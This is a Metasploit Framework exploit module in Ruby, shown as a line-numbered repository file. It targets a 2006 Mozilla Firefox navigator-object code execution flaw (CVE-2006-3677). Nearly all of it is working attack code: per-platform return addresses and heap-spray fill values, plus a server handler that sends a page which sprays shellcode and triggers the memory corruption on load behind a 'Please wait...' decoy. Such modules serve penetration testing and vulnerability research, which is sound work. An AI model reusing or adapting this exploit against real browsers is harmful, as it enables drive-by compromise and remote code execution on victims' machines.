root / modules / exploits / multi / browser / mozilla_navigatorjava.rb @ master
History | View | Annotate | Download (3.6 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core/constants'
|
| 13 |
require 'msf/core'
|
| 14 |
|
| 15 |
class Metasploit3 < Msf::Exploit::Remote |
| 16 |
Rank = NormalRanking |
| 17 |
|
| 18 |
include Msf::Exploit::Remote::HttpServer::HTML |
| 19 |
|
| 20 |
include Msf::Exploit::Remote::BrowserAutopwn |
| 21 |
autopwn_info({
|
| 22 |
:ua_name => HttpClients::FF, |
| 23 |
:ua_minver => "1.5.0", |
| 24 |
:ua_maxver => "1.5.1", |
| 25 |
:javascript => true, |
| 26 |
:rank => NormalRanking, # reliable memory corruption |
| 27 |
:vuln_test => %Q| |
| 28 |
is_vuln = false; |
| 29 |
if (navigator.javaEnabled()){
|
| 30 |
is_vuln = true; |
| 31 |
} |
| 32 |
|,
|
| 33 |
}) |
| 34 |
|
| 35 |
def initialize(info = {}) |
| 36 |
super(update_info(info,
|
| 37 |
'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution', |
| 38 |
'Description' => %q{ |
| 39 |
This module exploits a code execution vulnerability in the Mozilla |
| 40 |
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit |
| 41 |
requires the Java plugin to be installed. |
| 42 |
},
|
| 43 |
'License' => MSF_LICENSE, |
| 44 |
'Author' => ['hdm'], |
| 45 |
'Version' => '$Revision$', |
| 46 |
'References' =>
|
| 47 |
[ |
| 48 |
['CVE', '2006-3677'], |
| 49 |
['OSVDB', '27559'], |
| 50 |
['BID', '19192'], |
| 51 |
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'], |
| 52 |
['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'], |
| 53 |
], |
| 54 |
'Payload' =>
|
| 55 |
{
|
| 56 |
'Space' => 512, |
| 57 |
'BadChars' => "", |
| 58 |
}, |
| 59 |
'Targets' =>
|
| 60 |
[ |
| 61 |
[ 'Firefox 1.5.0.4 Windows x86',
|
| 62 |
{
|
| 63 |
'Platform' => 'win', |
| 64 |
'Arch' => ARCH_X86, |
| 65 |
'Ret' => 0x08000800, |
| 66 |
'Fill' => "%u0800", |
| 67 |
} |
| 68 |
], |
| 69 |
[ 'Firefox 1.5.0.4 Linux x86',
|
| 70 |
{
|
| 71 |
'Platform' => 'linux', |
| 72 |
'Arch' => ARCH_X86, |
| 73 |
'Ret' => -0x58000000, |
| 74 |
'Fill' => "%ua8a8", |
| 75 |
} |
| 76 |
], |
| 77 |
[ 'Firefox 1.5.0.4 Mac OS X PPC',
|
| 78 |
{
|
| 79 |
'Platform' => 'osx', |
| 80 |
'Arch' => ARCH_PPC, |
| 81 |
'Ret' => 0x0c000000, |
| 82 |
'Fill' => "%u0c0c", |
| 83 |
} |
| 84 |
], |
| 85 |
[ 'Firefox 1.5.0.4 Mac OS X x86',
|
| 86 |
{
|
| 87 |
'Platform' => 'osx', |
| 88 |
'Arch' => ARCH_X86, |
| 89 |
'Ret' => 0x1c000000, |
| 90 |
'Fill' => "%u1c1c", |
| 91 |
} |
| 92 |
], |
| 93 |
], |
| 94 |
'DisclosureDate' => 'Jul 25 2006' |
| 95 |
)) |
| 96 |
end
|
| 97 |
|
| 98 |
def on_request_uri(cli, request) |
| 99 |
|
| 100 |
# Re-generate the payload
|
| 101 |
return if ((p = regenerate_payload(cli)) == nil) |
| 102 |
|
| 103 |
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
| 104 |
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
| 105 |
|
| 106 |
# Handle the payload
|
| 107 |
handler(cli) |
| 108 |
end
|
| 109 |
|
| 110 |
def generate_html(payload) |
| 111 |
|
| 112 |
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) |
| 113 |
|
| 114 |
return %Q| |
| 115 |
<html><head> |
| 116 |
<script> |
| 117 |
function Exploit() {
|
| 118 |
if (window.navigator.javaEnabled) {
|
| 119 |
var shellcode = unescape("#{enc_code}");
|
| 120 |
var b = unescape("#{target['Fill']}");
|
| 121 |
while (b.length <= 0x400000) b+=b; |
| 122 |
|
| 123 |
var c = new Array(); |
| 124 |
for (var i =0; i<36; i++) {
|
| 125 |
c[i] = |
| 126 |
b.substring(0, 0x100000 - shellcode.length) + shellcode + |
| 127 |
b.substring(0, 0x100000 - shellcode.length) + shellcode + |
| 128 |
b.substring(0, 0x100000 - shellcode.length) + shellcode + |
| 129 |
b.substring(0, 0x100000 - shellcode.length) + shellcode; |
| 130 |
} |
| 131 |
|
| 132 |
window.navigator = (#{target['Ret']} / 2); |
| 133 |
try {
|
| 134 |
java.lang.reflect.Runtime.newInstance( |
| 135 |
java.lang.Class.forName("java.lang.Runtime"), 0
|
| 136 |
); |
| 137 |
}catch(e){
|
| 138 |
|
| 139 |
} |
| 140 |
} |
| 141 |
} |
| 142 |
</script> |
| 143 |
</head><body onload='Exploit()'>Please wait...</body></html> |
| 144 |
|
|
| 145 |
end
|
| 146 |
end
|